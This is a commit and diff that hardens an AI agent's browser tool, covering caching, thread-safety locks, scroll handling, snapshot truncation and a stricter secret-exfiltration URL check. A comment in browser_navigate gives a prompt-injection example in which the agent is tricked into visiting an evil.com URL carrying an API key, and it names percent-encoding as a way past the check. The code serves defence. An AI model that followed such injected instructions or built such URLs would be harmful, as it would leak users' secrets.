fix(browser): hardening — dead code, caching, scroll perf, security, thread safety

Salvaged from PR #7276 (hardening-only subset; excluded 6 new tools
and unrelated scope additions from the contributor's commit).

- Remove dead DEFAULT_SESSION_TIMEOUT and unregistered browser_close schema
- Fix _camofox_eval wrong call signatures (_ensure_tab, _post args)
- Cache _find_agent_browser, _get_command_timeout, _discover_homebrew_node_dirs
- Replace 5x subprocess scroll loop with single pixel-arg call
- URL-decode before secret exfiltration check (bypass prevention)
- Protect _recording_sessions with _cleanup_lock (thread safety)
- Return failure on empty stdout instead of silent success
- Structure-aware _truncate_snapshot (cut at line boundaries)

Follow-up improvements over contributor's original:
- Move _EMPTY_OK_COMMANDS to module-level frozenset (avoid per-call allocation)
- Fix list+tuple concat in _run_browser_command PATH construction
- Update test_browser_homebrew_paths.py for tuple returns and cache fixtures

Co-authored-by: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com>
Closes #7168, closes #7171, closes #7172, closes #7173
This commit is contained in:
kshitijk4poor 2026-04-10 13:00:23 -07:00 committed by Teknium
parent c6e1add6f1
commit 37a1c75716
3 changed files with 406 additions and 64 deletions

View file

@ -50,6 +50,7 @@ Usage:
"""
import atexit
import functools
import json
import logging
import os
@ -100,27 +101,27 @@ _SANE_PATH = (
)
def _discover_homebrew_node_dirs() -> list[str]:
@functools.lru_cache(maxsize=1)
def _discover_homebrew_node_dirs() -> tuple[str, ...]:
"""Find Homebrew versioned Node.js bin directories (e.g. node@20, node@24).
When Node is installed via ``brew install node@24`` and NOT linked into
/opt/homebrew/bin, the binary lives only in /opt/homebrew/opt/node@24/bin/.
This function discovers those paths so they can be added to subprocess PATH.
/opt/homebrew/bin, agent-browser isn't discoverable on the default PATH.
This function finds those directories so they can be prepended.
"""
dirs: list[str] = []
homebrew_opt = "/opt/homebrew/opt"
if not os.path.isdir(homebrew_opt):
return dirs
return tuple(dirs)
try:
for entry in os.listdir(homebrew_opt):
if entry.startswith("node") and entry != "node":
# e.g. node@20, node@24
bin_dir = os.path.join(homebrew_opt, entry, "bin")
if os.path.isdir(bin_dir):
dirs.append(bin_dir)
except OSError:
pass
return dirs
return tuple(dirs)
# Throttle screenshot cleanup to avoid repeated full directory scans.
_last_screenshot_cleanup_by_dir: dict[str, float] = {}
@ -132,28 +133,39 @@ _last_screenshot_cleanup_by_dir: dict[str, float] = {}
# Default timeout for browser commands (seconds)
DEFAULT_COMMAND_TIMEOUT = 30
# Default session timeout (seconds)
DEFAULT_SESSION_TIMEOUT = 300
# Max tokens for snapshot content before summarization
SNAPSHOT_SUMMARIZE_THRESHOLD = 8000
# Commands that legitimately return empty stdout (e.g. close, record).
_EMPTY_OK_COMMANDS: frozenset = frozenset({"close", "record"})
_cached_command_timeout: Optional[int] = None
_command_timeout_resolved = False
def _get_command_timeout() -> int:
"""Return the configured browser command timeout from config.yaml.
Reads ``config["browser"]["command_timeout"]`` and falls back to
``DEFAULT_COMMAND_TIMEOUT`` (30s) if unset or unreadable.
``DEFAULT_COMMAND_TIMEOUT`` (30s) if unset or unreadable. Result is
cached after the first call and cleared by ``cleanup_all_browsers()``.
"""
global _cached_command_timeout, _command_timeout_resolved
if _command_timeout_resolved:
return _cached_command_timeout # type: ignore[return-value]
_command_timeout_resolved = True
result = DEFAULT_COMMAND_TIMEOUT
try:
from hermes_cli.config import read_raw_config
cfg = read_raw_config()
val = cfg.get("browser", {}).get("command_timeout")
if val is not None:
return max(int(val), 5) # Floor at 5s to avoid instant kills
result = max(int(val), 5) # Floor at 5s to avoid instant kills
except Exception as e:
logger.debug("Could not read command_timeout from config: %s", e)
return DEFAULT_COMMAND_TIMEOUT
_cached_command_timeout = result
return result
def _get_vision_model() -> Optional[str]:
@ -239,6 +251,8 @@ _cached_cloud_provider: Optional[CloudBrowserProvider] = None
_cloud_provider_resolved = False
_allow_private_urls_resolved = False
_cached_allow_private_urls: Optional[bool] = None
_cached_agent_browser: Optional[str] = None
_agent_browser_resolved = False
def _get_cloud_provider() -> Optional[CloudBrowserProvider]:
@ -415,7 +429,7 @@ def _emergency_cleanup_all_sessions():
with _cleanup_lock:
_active_sessions.clear()
_session_last_activity.clear()
_recording_sessions.clear()
_recording_sessions.clear()
# Register cleanup via atexit only. Previous versions installed SIGINT/SIGTERM
@ -617,15 +631,6 @@ BROWSER_TOOL_SCHEMAS = [
"required": ["key"]
}
},
{
"name": "browser_close",
"description": "Close the browser session and release resources. Call this when done with browser tasks to free up cloud browser session quota.",
"parameters": {
"type": "object",
"properties": {},
"required": []
}
},
{
"name": "browser_get_images",
"description": "Get a list of all images on the current page with their URLs and alt text. Useful for finding images to analyze with the vision tool. Requires browser_navigate to be called first.",
@ -777,10 +782,26 @@ def _find_agent_browser() -> str:
Raises:
FileNotFoundError: If agent-browser is not installed
"""
global _cached_agent_browser, _agent_browser_resolved
if _agent_browser_resolved:
if _cached_agent_browser is None:
raise FileNotFoundError(
"agent-browser CLI not found (cached). Install it with: "
f"{_browser_install_hint()}\n"
"Or run 'npm install' in the repo root to install locally.\n"
"Or ensure npx is available in your PATH."
)
return _cached_agent_browser
# Note: _agent_browser_resolved is set at each return site below
# (not before the search) to prevent a race where a concurrent thread
# sees resolved=True but _cached_agent_browser is still None.
# Check if it's in PATH (global install)
which_result = shutil.which("agent-browser")
if which_result:
_cached_agent_browser = which_result
_agent_browser_resolved = True
return which_result
# Build an extended search PATH including Homebrew and Hermes-managed dirs.
@ -800,21 +821,29 @@ def _find_agent_browser() -> str:
extended_path = os.pathsep.join(extra_dirs)
which_result = shutil.which("agent-browser", path=extended_path)
if which_result:
_cached_agent_browser = which_result
_agent_browser_resolved = True
return which_result
# Check local node_modules/.bin/ (npm install in repo root)
repo_root = Path(__file__).parent.parent
local_bin = repo_root / "node_modules" / ".bin" / "agent-browser"
if local_bin.exists():
return str(local_bin)
_cached_agent_browser = str(local_bin)
_agent_browser_resolved = True
return _cached_agent_browser
# Check common npx locations (also search extended dirs)
npx_path = shutil.which("npx")
if not npx_path and extra_dirs:
npx_path = shutil.which("npx", path=os.pathsep.join(extra_dirs))
if npx_path:
return "npx agent-browser"
_cached_agent_browser = "npx agent-browser"
_agent_browser_resolved = True
return _cached_agent_browser
# Nothing found — cache the failure so subsequent calls don't re-scan.
_agent_browser_resolved = True
raise FileNotFoundError(
"agent-browser CLI not found. Install it with: "
f"{_browser_install_hint()}\n"
@ -935,7 +964,7 @@ def _run_browser_command(
path_parts = [p for p in existing_path.split(":") if p]
candidate_dirs = (
[hermes_node_bin]
+ _discover_homebrew_node_dirs()
+ list(_discover_homebrew_node_dirs())
+ [p for p in _SANE_PATH.split(":") if p]
)
@ -994,15 +1023,15 @@ def _run_browser_command(
level = logging.WARNING if returncode != 0 else logging.DEBUG
logger.log(level, "browser '%s' stderr: %s", command, stderr.strip()[:500])
# Log empty output as warning — common sign of broken agent-browser
if not stdout.strip() and returncode == 0:
logger.warning("browser '%s' returned empty stdout with rc=0. "
"cmd=%s stderr=%s",
command, " ".join(cmd_parts[:4]) + "...",
(stderr or "")[:200])
stdout_text = stdout.strip()
# Empty output with rc=0 is a broken state — treat as failure rather
# than silently returning {"success": True, "data": {}}.
# Some commands (close, record) legitimately return no output.
if not stdout_text and returncode == 0 and command not in _EMPTY_OK_COMMANDS:
logger.warning("browser '%s' returned empty output (rc=0)", command)
return {"success": False, "error": f"Browser command '{command}' returned no output"}
if stdout_text:
try:
parsed = json.loads(stdout_text)
@ -1114,20 +1143,34 @@ def _extract_relevant_content(
def _truncate_snapshot(snapshot_text: str, max_chars: int = 8000) -> str:
"""
Simple truncation fallback for snapshots.
"""Structure-aware truncation for snapshots.
Cuts at line boundaries so that accessibility tree elements are never
split mid-line, and appends a note telling the agent how much was
omitted.
Args:
snapshot_text: The snapshot text to truncate
max_chars: Maximum characters to keep
Returns:
Truncated text with indicator if truncated
"""
if len(snapshot_text) <= max_chars:
return snapshot_text
return snapshot_text[:max_chars] + "\n\n[... content truncated ...]"
lines = snapshot_text.split('\n')
result: list[str] = []
chars = 0
for line in lines:
if chars + len(line) + 1 > max_chars - 80: # reserve space for note
break
result.append(line)
chars += len(line) + 1
remaining = len(lines) - len(result)
if remaining > 0:
result.append(f'\n[... {remaining} more lines truncated, use browser_snapshot for full content]')
return '\n'.join(result)
# ============================================================================
@ -1148,8 +1191,11 @@ def browser_navigate(url: str, task_id: Optional[str] = None) -> str:
# Secret exfiltration protection — block URLs that embed API keys or
# tokens in query parameters. A prompt injection could trick the agent
# into navigating to https://evil.com/steal?key=sk-ant-... to exfil secrets.
# Also check URL-decoded form to catch %2D encoding tricks (e.g. sk%2Dant%2D...).
import urllib.parse
from agent.redact import _PREFIX_RE
if _PREFIX_RE.search(url):
url_decoded = urllib.parse.unquote(url)
if _PREFIX_RE.search(url) or _PREFIX_RE.search(url_decoded):
return json.dumps({
"success": False,
"error": "Blocked: URL contains what appears to be an API key or token. "
@ -1415,13 +1461,15 @@ def browser_scroll(direction: str, task_id: Optional[str] = None) -> str:
"error": f"Invalid direction '{direction}'. Use 'up' or 'down'."
}, ensure_ascii=False)
# Repeat the scroll 5 times to get meaningful page movement.
# Most backends scroll ~100px per call, which is barely visible.
# 5x gives roughly half a viewport of travel, backend-agnostic.
_SCROLL_REPEATS = 5
# Single scroll with pixel amount instead of 5x subprocess calls.
# agent-browser supports: agent-browser scroll down 500
# ~500px is roughly half a viewport of travel.
_SCROLL_PIXELS = 500
if _is_camofox_mode():
from tools.browser_camofox import camofox_scroll
# Camofox REST API doesn't support pixel args; use repeated calls
_SCROLL_REPEATS = 5
result = None
for _ in range(_SCROLL_REPEATS):
result = camofox_scroll(direction, task_id)
@ -1429,14 +1477,12 @@ def browser_scroll(direction: str, task_id: Optional[str] = None) -> str:
effective_task_id = task_id or "default"
result = None
for _ in range(_SCROLL_REPEATS):
result = _run_browser_command(effective_task_id, "scroll", [direction])
if not result.get("success"):
return json.dumps({
"success": False,
"error": result.get("error", f"Failed to scroll {direction}")
}, ensure_ascii=False)
result = _run_browser_command(effective_task_id, "scroll", [direction, str(_SCROLL_PIXELS)])
if not result.get("success"):
return json.dumps({
"success": False,
"error": result.get("error", f"Failed to scroll {direction}")
}, ensure_ascii=False)
return json.dumps({
"success": True,
@ -1607,11 +1653,11 @@ def _browser_eval(expression: str, task_id: Optional[str] = None) -> str:
def _camofox_eval(expression: str, task_id: Optional[str] = None) -> str:
"""Evaluate JS via Camofox's /tabs/{tab_id}/eval endpoint (if available)."""
from tools.browser_camofox import _get_session, _ensure_tab, _post
from tools.browser_camofox import _ensure_tab, _post
try:
session = _get_session(task_id or "default")
tab_id = _ensure_tab(session)
resp = _post(f"/tabs/{tab_id}/eval", json_data={"expression": expression})
tab_info = _ensure_tab(task_id or "default")
tab_id = tab_info.get("tab_id") or tab_info.get("id")
resp = _post(f"/tabs/{tab_id}/eval", body={"expression": expression})
# Camofox returns the result in a JSON envelope
raw_result = resp.get("result") if isinstance(resp, dict) else resp
@ -1641,8 +1687,9 @@ def _camofox_eval(expression: str, task_id: Optional[str] = None) -> str:
def _maybe_start_recording(task_id: str):
"""Start recording if browser.record_sessions is enabled in config."""
if task_id in _recording_sessions:
return
with _cleanup_lock:
if task_id in _recording_sessions:
return
try:
from hermes_cli.config import read_raw_config
hermes_home = get_hermes_home()
@ -1662,7 +1709,8 @@ def _maybe_start_recording(task_id: str):
result = _run_browser_command(task_id, "record", ["start", str(recording_path)])
if result.get("success"):
_recording_sessions.add(task_id)
with _cleanup_lock:
_recording_sessions.add(task_id)
logger.info("Auto-recording browser session %s to %s", task_id, recording_path)
else:
logger.debug("Could not start auto-recording: %s", result.get("error"))
@ -1672,8 +1720,9 @@ def _maybe_start_recording(task_id: str):
def _maybe_stop_recording(task_id: str):
"""Stop recording if one is active for this session."""
if task_id not in _recording_sessions:
return
with _cleanup_lock:
if task_id not in _recording_sessions:
return
try:
result = _run_browser_command(task_id, "record", ["stop"])
if result.get("success"):
@ -1682,7 +1731,8 @@ def _maybe_stop_recording(task_id: str):
except Exception as e:
logger.debug("Could not stop recording for %s: %s", task_id, e)
finally:
_recording_sessions.discard(task_id)
with _cleanup_lock:
_recording_sessions.discard(task_id)
def browser_get_images(task_id: Optional[str] = None) -> str:
@ -2041,6 +2091,14 @@ def cleanup_all_browsers() -> None:
for task_id in task_ids:
cleanup_browser(task_id)
# Reset cached lookups so they are re-evaluated on next use.
global _cached_agent_browser, _agent_browser_resolved
global _cached_command_timeout, _command_timeout_resolved
_cached_agent_browser = None
_agent_browser_resolved = False
_discover_homebrew_node_dirs.cache_clear()
_cached_command_timeout = None
_command_timeout_resolved = False
# ============================================================================